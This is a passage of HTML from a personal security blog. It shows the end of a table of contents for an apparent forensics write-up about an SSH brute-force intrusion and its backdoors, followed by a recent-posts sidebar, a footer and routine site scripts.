class="toc-link" href="#6-%E6%94%BB%E5%87%BB%E8%80%85%E4%BD%BF%E7%94%A8%E4%BA%86%E4%BB%80%E4%B9%88%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C-SSH-%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%9F%EF%BC%88%E5%86%99%E5%87%BA%E5%B7%A5%E5%85%B7%E5%90%8D%E7%A7%B0%E5%92%8C-SSH-%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%A0%87%E8%AF%86%EF%BC%89"><span class="toc-number">1.0.6.</span> <span class="toc-text">6. 攻击者使用了什么工具进行 SSH 暴力破解？（写出工具名称和 SSH 客户端标识）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E5%8F%97%E5%AE%B3%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84-SSH-%E6%9C%8D%E5%8A%A1%E7%89%88%E6%9C%AC%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.7.</span> <span class="toc-text">7. 受害服务器的 SSH 服务版本是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-%E6%94%BB%E5%87%BB%E8%80%85%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%85%B1%E5%B0%9D%E8%AF%95%E4%BA%86%E5%A4%9A%E5%B0%91%E6%AC%A1%E5%AF%86%E7%A0%81%EF%BC%9F"><span class="toc-number">1.0.8.</span> <span class="toc-text">8. 攻击者暴力破解共尝试了多少次密码？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-%E6%94%BB%E5%87%BB%E8%80%85%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E6%88%90%E5%8A%9F%E5%90%8E%E7%99%BB%E5%BD%95%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.9.</span> <span class="toc-text">9. 攻击者暴力破解成功后登录的用户名是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-%E6%94%BB%E5%87%BB%E8%80%85%E8%BF%9B%E5%85%A5%E5%8F%8D%E5%BC%B9-Shell-%E5%90%8E%E6%89%A7%E8%A1%8C%E7%9A%84%E7%AC%AC%E4%B8%80%E6%9D%A1%E5%91%BD%E4%BB%A4%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.10.</span> <span class="toc-text">10. 攻击者进入反弹 Shell 后执行的第一条命令是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#11-%E6%94%BB%E5%87%BB%E8%80%85%E4%B8%80%E5%85%B1%E5%BB%BA%E7%AB%8B%E4%BA%86%E5%87%A0%E6%AC%A1%E5%8F%8D%E5%BC%B9-Shell-%E8%BF%9E%E6%8E%A5%EF%BC%9F"><span class="toc-number">1.0.11.</span> <span class="toc-text">11. 攻击者一共建立了几次反弹 Shell 连接？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#12-%E5%8F%97%E5%AE%B3%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84%E4%B8%BB%E6%9C%BA%E5%90%8D%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.12.</span> <span class="toc-text">12. 受害服务器的主机名是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#13-%E6%94%BB%E5%87%BB%E8%80%85%E6%89%8B%E5%8A%A8%E7%99%BB%E5%BD%95%E6%97%B6%E4%BD%BF%E7%94%A8%E7%9A%84-SSH-%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%A0%87%E8%AF%86%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.13.</span> <span class="toc-text">13. 攻击者手动登录时使用的 SSH 客户端标识是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#14-%E5%8F%8D%E5%BC%B9-Shell-%E4%BD%BF%E7%94%A8%E7%9A%84%E7%AB%AF%E5%8F%A3%E5%8F%B7%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.14.</span> <span class="toc-text">14. 反弹 Shell 使用的端口号是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#15-%E5%8F%8D%E5%BC%B9-Shell-%E7%9A%84%E8%BF%9E%E6%8E%A5%E6%96%B9%E5%90%91%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.15.</span> <span class="toc-text">15. 反弹 Shell 的连接方向是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#16-%E6%94%BB%E5%87%BB%E8%80%85%E5%B0%86-root-%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E4%B8%BA%E4%BA%86%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.16.</span> <span class="toc-text">16. 攻击者将 root 密码修改为了什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#17-%E6%94%BB%E5%87%BB%E8%80%85%E5%88%9B%E5%BB%BA%E7%9A%84%E5%BD%B1%E5%AD%90%E8%B4%A6%E6%88%B7%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C-UID-%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.17.</span> <span class="toc-text">17. 攻击者创建的影子账户用户名和 UID 分别是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#18-%E6%94%BB%E5%87%BB%E8%80%85%E5%86%99%E5%85%A5%E7%9A%84-Crontab-%E5%90%8E%E9%97%A8%E5%AE%8C%E6%95%B4%E5%86%85%E5%AE%B9%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.18.</span> <span class="toc-text">18. 攻击者写入的 Crontab 后门完整内容是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#19-%E6%94%BB%E5%87%BB%E8%80%85-Crontab-%E5%90%8E%E9%97%A8%E7%9A%84%E5%9B%9E%E8%BF%9E%E7%AB%AF%E5%8F%A3%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.19.</span> <span class="toc-text">19. 攻击者 Crontab 后门的回连端口是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#20-%E6%94%BB%E5%87%BB%E8%80%85%E5%9C%A8%E5%8F%97%E5%AE%B3%E6%9C%BA%E4%B8%8A%E5%88%9B%E5%BB%BA%E7%9A%84%E9%9A%90%E8%97%8F%E5%90%8E%E9%97%A8%E8%84%9A%E6%9C%AC%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.20.</span> <span class="toc-text">20. 攻击者在受害机上创建的隐藏后门脚本完整路径是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#21-%E6%94%BB%E5%87%BB%E8%80%85%E5%86%99%E5%85%A5-SSH-%E5%85%AC%E9%92%A5%E5%90%8E%E9%97%A8%E7%9A%84%E5%85%AC%E9%92%A5%E6%96%87%E4%BB%B6%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.21.</span> <span class="toc-text">21. 攻击者写入 SSH 公钥后门的公钥文件完整路径是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#22-%E5%8F%97%E5%AE%B3%E6%9C%BA-x2F-etc-x2F-shadow-%E6%96%87%E4%BB%B6%E4%B8%AD-root-%E7%94%A8%E6%88%B7%E7%9A%84%E5%AF%86%E7%A0%81%E5%93%88%E5%B8%8C%E5%80%BC%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.22.</span> <span class="toc-text">22. 受害机 &#x2F;etc&#x2F;shadow 文件中 root 用户的密码哈希值是什么？</span></a></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/13575d6e.html" title="HMV-Longshao"><img src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HMV-Longshao"/></a><div class="content"><a class="title" href="/posts/13575d6e.html" title="HMV-Longshao">HMV-Longshao</a><time datetime="2026-07-27T09:15:20.000Z" title="发表于 2026-07-27 17:15:20">2026-07-27</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/896ce370.html" title="好靶场杯第一届综合赛-古法赛道-FTP"><img src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="好靶场杯第一届综合赛-古法赛道-FTP"/></a><div class="content"><a class="title" href="/posts/896ce370.html" title="好靶场杯第一届综合赛-古法赛道-FTP">好靶场杯第一届综合赛-古法赛道-FTP</a><time datetime="2026-07-19T08:52:55.000Z" title="发表于 2026-07-19 16:52:55">2026-07-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/cfac8c7a.html" title="好靶场杯第一届综合赛-古法赛道-SSH"><img src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="好靶场杯第一届综合赛-古法赛道-SSH"/></a><div class="content"><a class="title" href="/posts/cfac8c7a.html" title="好靶场杯第一届综合赛-古法赛道-SSH">好靶场杯第一届综合赛-古法赛道-SSH</a><time datetime="2026-07-19T07:08:24.000Z" title="发表于 2026-07-19 15:08:24">2026-07-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/7603c458.html" title="HMV-Iot"><img src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HMV-Iot"/></a><div class="content"><a class="title" href="/posts/7603c458.html" title="HMV-Iot">HMV-Iot</a><time datetime="2026-07-16T06:03:08.000Z" title="发表于 2026-07-16 14:03:08">2026-07-16</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/854f4ffb.html" title="HMV-Azer"><img src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HMV-Azer"/></a><div class="content"><a class="title" href="/posts/854f4ffb.html" title="HMV-Azer">HMV-Azer</a><time datetime="2026-07-06T13:00:07.000Z" title="发表于 2026-07-06 21:00:07">2026-07-06</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;undefined - 2026  <i id="heartbeat" class="fa fas fa-heartbeat"></i> Morii</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div><<head><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/HCLonely/images@master/others/heartbeat.min.css"></head></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="chat_btn" type="button" title="聊天"><i class="fas fa-sms"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>(()=>{
  const init = () => {
    twikoo.init(Object.assign({
      el: '#twikoo-wrap',
      envId: 'https://twikooo-one.vercel.app/',
      region: 'us-east-1',
      onCommentLoaded: function () {
        btf.loadLightbox(document.querySelectorAll('#twikoo .tk-content img:not(.tk-owo-emotion)'))
      }
    }, null))
  }

  const getCount = () => {
    const countELement = document.getElementById('twikoo-count')
    if(!countELement) return
    twikoo.getCommentsCount({
      envId: 'https://twikooo-one.vercel.app/',
      region: 'us-east-1',
      urls: [window.location.pathname],
      includeReply: false
    }).then(function (res) {
      countELement.innerText = res[0].count
    }).catch(function (err) {
      console.error(err);
    });
  }

  const runFn = () => {
    init()
    GLOBAL_CONFIG_SITE.isPost && getCount()
  }

  const loadTwikoo = () => {
    if (typeof twikoo === 'object') {
      setTimeout(runFn,0)
      return
    } 
    getScript('https://cdn.jsdelivr.net/npm/twikoo@1/dist/twikoo.all.min.js').then(runFn)
  }

  if ('Twikoo' === 'Twikoo' || !true) {
    if (true) btf.loadComment(document.getElementById('twikoo-wrap'), loadTwikoo)
    else loadTwikoo()
  } else {
    window.loadOtherComment = () => {
      loadTwikoo()
    }
  }
})()</script><script>function loadValine () {
  function initValine () {
    const valine = new Valine(Object.assign({
      el: '#vcomment',
      appId: 'BF23duYcvhYPZIqUHv6NigOn-MdYXbMMI',
      appKey: 'Bb6SG97mQjBt3SKeopWEnnQU',
      avatar: 'monsterid',
      serverURLs: 'https://bf23duyc.api.lncldglobal.com',
      emojiMaps: "",
      path: window.location.pathname,
      visitor: false
    }, null))
  }

  if (typeof Valine === 'function') initValine() 
  else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}

if ('Twikoo' === 'Valine' || !true) {
  if (true) btf.loadComment(document.getElementById('vcomment'),loadValine)
  else setTimeout(loadValine, 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script></div><script defer data-pjax type="text/javascript" src="https://npm.elemecdn.com/xianqi-hexo/js/animate.js"></script><div class="aplayer no-destroy" data-id="3485712867" data-server="tencent" data-type="playlist" data-fixed="true" data-mini="true" data-listFolded="false" data-order="random" data-preload="auto" data-autoplay="false" muted></div><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/fireworks.min.js"></script><script defer="defer" id="fluttering_ribbon" mobile="true" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-fluttering-ribbon.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script src="//code.tidio.co/null.js" async="async"></script><script>function onTidioChatApiReady() {
  window.tidioChatApi.hide();
  window.tidioChatApi.on("close", function() {
    window.tidioChatApi.hide();
  });
}
if (window.tidioChatApi) {
  window.tidioChatApi.on("ready", onTidioChatApiReady);
} else {
  document.addEventListener("tidioChat-ready", onTidioChatApiReady);
}

var chatBtnFn = () => {
  document.getElementById("chat_btn").addEventListener("click", function(){
    window.tidioChatApi.show();
    window.tidioChatApi.open();
  });
}
chatBtnFn()
</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1/dist/APlayer.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/aplayer@1/dist/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show","#posts-chart","#tags-chart","#categories-chart",".js-pjax"]

var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:send', function () {

  // removeEventListener scroll 
  window.tocScrollFn && window.removeEventListener('scroll', window.tocScrollFn)
  window.scrollCollect && window.removeEventListener('scroll', scrollCollect)

  typeof preloader === 'object' && preloader.initLoading()
  document.getElementById('rightside').style.cssText = "opacity: ''; transform: ''"
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  //reset readmode
  const $bodyClassList = document.body.classList
  $bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')

  typeof disqusjs === 'object' && disqusjs.destroy()
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  // google analytics
  typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});

  // baidu analytics
  typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()

  typeof preloader === 'object' && preloader.endLoading()
})

document.addEventListener('pjax:error', (e) => {
  if (e.request.status === 404) {
    pjax.loadUrl('/404.html')
  }
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":160,"height":260},"mobile":{"show":false},"marked":{"prependRoot":true,"postAsset":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>